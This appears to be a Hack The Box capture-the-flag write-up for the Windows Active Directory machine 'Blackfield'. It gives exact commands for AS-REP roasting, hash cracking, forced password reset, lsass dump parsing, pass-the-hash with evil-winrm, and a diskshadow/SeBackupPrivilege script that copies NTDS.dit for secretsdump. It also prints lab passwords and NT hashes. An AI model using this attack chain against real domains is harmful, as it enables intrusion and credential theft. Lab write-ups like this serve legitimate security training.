Blackfield is a hard difficulty Windows machine that features an Active Directory environment. It begins with collecting a list of usernames from an SMB share. With these usernames, I'm able to perform an AS-REP roasting attack and obtain a TGT for a helpdesk account. The helpdesk account can be used to reset the password of an audit account. Re-enumerating SMB shares using the audit account finds an LSASS memory dump file. The dump file contains the NT hash of a service account that is a member of Backup Operators. The privileges of the Backup Operators group can be abused to create a volume shadow copy and pull the NTDS.dit file from there. With the NTDS.dit file, I'm able to retrieve the NT hash of the administrator account, and then perform a pass-the-hash attack to gain administrator access.
Reconnaissance
Nmap
nmap -sC -sV -oN initial-blackfield 10.10.10.192
An initial TCP scan with nmap discovered at least seven open ports. These are the ports typically found on an Active Directory Domain Controller (AD DC).
I’ll summarize the result:
- There is a DNS service on port 53, but an HTB box is a single machine, so enumerating this service is not a priority.
- Port 88 is running Kerberos. I can try AS-REP roasting here.
- There is an MS-RPC service on port 135, which I don't touch very often, so I'll lower its priority.
- There is an LDAP service on port 389. LDAP is the standard protocol for directory services; Active Directory is Microsoft's implementation of directory services and it supports LDAP queries.
- There is an SMB service on port 445. I can try anonymous login here.
- Port 3268 is running LDAP as well, but it's used as the global catalog (read more: here).
nmap also identified the AD domain name as blackfield.local.
TCP 389 — LDAP
On LDAP, I can send a query to obtain the domain metadata, but first I'll look at the rootDSE to retrieve the list of naming contexts.
ldapsearch -LLL -x -h 10.10.10.192 -s base namingContexts
- -LLL: don't show comments
- -x: use simple authentication
- -h: hostname or IP
- -s: search scope (base, i.e. the rootDSE)
I can then use DC=BLACKFIELD,DC=local (the domain's distinguished name) as the search base.
ldapsearch -LLL -x -h 10.10.10.192 -b "DC=BLACKFIELD,DC=local"
But unfortunately, the anonymous bind is not allowed.
TCP 445 — SMB
Trying anonymous login with crackmapexec returns a status of access denied.
crackmapexec smb 10.10.10.192 -u '' -p '' --shares
But with smbclient, it returns the share list.
Later, I came to know that 'anonymous' must be specified in crackmapexec.
I have read permission on the profile$ share. The share contains a bunch of empty user folders. I can convert these folder names to a list of usernames using awk '{print $1}'.
Now that I have a list of usernames, I can try an AS-REP roasting attack on Kerberos.
TCP 88 — Kerberos
I'll use GetNPUsers.py to perform AS-REP roasting against Kerberos.
GetNPUsers.py BLACKFIELD.LOCAL/ -no-pass -usersfile asreproast -dc-ip 10.10.10.192 -outputfile TGT_AS-REP
And watch the output file using the watch command:
watch -n 1 cat TGT_AS-REP
I'll send the hash to my Windows machine for cracking.
:: Cracking the Hash
I'll use a dictionary attack to recover the user password using hashcat, and it cracks within a few seconds.
hashcat -m 18200 hashes/blackfield.hash rockyou.txt -O
The password for user support is #00^BlackKnight.
Access as support
Now that I have obtained a set of credentials, I can re-enumerate the available services.
:: LDAP Domain Dump
ldapdomaindump -u 'BLACKFIELD.LOCAL\support' -p '#00^BlackKnight' -no-json -no-grep 10.10.10.192
The credentials work on LDAP, so I can use them to obtain the domain info using ldapdomaindump.
The output from the tool is formatted as HTML documents, and I get the following information:
The OS information and the computer FQDN.
The domain policy.
Interesting domain users.
Interesting groups.
From here, I know that user support does not have remote shell access such as WinRM.
:: Bloodhound
There is a Python-based ingestor for BloodHound besides SharpHound. It can be used remotely from Linux.
python bloodhound.py -c All -u 'support@blackfield.local' -p '#00^BlackKnight' -d blackfield.local -dc DC01.BLACKFIELD.local -ns 10.10.10.192
- -c: collection method: All
- -u, -p: credential set
- -d: domain name
- -dc: FQDN of the domain controller (it's in the LDAP domain dump section → domain_computers.html)
- -ns: name server / DNS
It returns the following output:
My default python is python2
The output files from the tool are in JSON format: computers.json, domains.json, groups.json and users.json.
I can upload these files to the BloodHound GUI by drag and drop.
Enumerating the permissions of user support discovers that it has ForceChangePassword on Audit2020. That means user support is able to change the password of user audit2020.
:: Reset Audit2020 Password
I can change the password of user audit2020 using net rpc. I'll set P@$$w0rd! as the new password for user audit2020.
net rpc password audit2020 -U 'support%#00^BlackKnight' -S 10.10.10.192
Access as Audit2020
:: forensic share
With audit2020, I can access the forensic share.
smbmap -H 10.10.10.192 -u audit2020 -p 'P@$$w0rd!'
Inside the share, there are three folders, and I'll download all of them to my Kali.
smbclient -U 'audit2020%P@$$w0rd!' //10.10.10.192/forensic
Enumerating the memory_analysis folder, there is a file called lsass.zip that contains lsass.DMP, which is interesting to me.
lsass (Local Security Authority Subsystem Service) is a service/process used to verify and authenticate users on login to a Windows computer. In short, it holds the credentials from the Windows registry, CMIIW.
I can use a tool called pypykatz to dump the contents of lsass.DMP, and the NT hash of svc_backup immediately shows up at the top:
svc_backup:9658d1d1dcd9250115e2205d9f48400d
Foothold
Remote Access
I already know that svc_backup can log in remotely (from LDAP), so I can try it with evil-winrm, and it works.
evil-winrm -i 10.10.10.192 -u svc_backup -H '9658d1d1dcd9250115e2205d9f48400d'
User flag is done here. (Actually I found a notes.txt in C:\, but I'll just skip that here.)
Privileges Escalation
Internal enumeration
Also from LDAP, I know svc_backup is a member of the Backup Operators group. Each member of the Backup Operators group can perform backup and restore operations. The privileges for those two operations are called SeBackupPrivilege and SeRestorePrivilege.
Those two privileges can be abused using diskshadow (check out the references at the bottom of this writeup for sources).
I can't just back up and restore files that the system currently has in use. But there is a technology from Microsoft called "Shadow Copy" that makes this possible, and that's where diskshadow will be used.
So the idea is that I create a volume shadow of the C:\ drive and back up the NTDS.dit file (the AD database) from the volume shadow to the C:\ drive. After that I can grab ntds.dit and dump the NT hashes from it locally using secretsdump.py.
Abusing SeBackupPrivilege
To abuse this privilege I'll use this gist as a reference as well as this module.
Then, I'll create two scripts to perform all the needed actions (create a volume shadow, grab ntds.dit, and clean up the volume shadow) in one shot.
First, the script for grabbing ntds.dit, which I'll save as copy.cmd:
cmd.exe /c "powershell.exe -c Import-Module(Resolve-Path('SeBackupPrivilegeCmdLets.dll')); Import-Module(Resolve-Path('SeBackupPrivilegeCmdLets.dll')); Copy-FileSeBackupPrivilege f:\windows\ntds\ntds.dit C:\temp\ntds.dit"
Second, the script for creating and deleting the volume shadow, which I'll save as script.txt:
set context persistent nowriters
add volume c: alias iamf
create
expose %iamf% f:
exec "copy.cmd"
delete shadows volume %iamf%
reset
I'll move the modules and the scripts to a folder called exploits.
Now, I'll copy these .dll modules, copy.cmd, and script.txt to Blackfield using the upload feature of evil-winrm, into C:\temp\.
After that, I can run diskshadow with the /s option and specify script.txt as the command sequence.
*Evil-WinRM* PS C:\temp> diskshadow /s script.txt
Now that I have ntds.dit, the last file I need is the SYSTEM registry hive.
*Evil-WinRM* PS C:\temp> reg save HKLM\SYSTEM c:\temp\system
The operation completed successfully.
I'll download these files to my Kali using the evil-winrm download feature.
Credential Dumping
Now I can dump the NT hashes from ntds.dit and the system file using secretsdump.py.
secretsdump.py -system system -ntds ntds.dit LOCAL
Remote Access
I can use the NT hash of the administrator account to log in using the pass-the-hash feature of evil-winrm.
evil-winrm -i 10.10.10.192 -u administrator -H '184fb5e5178480be64824d4cd53b99ee'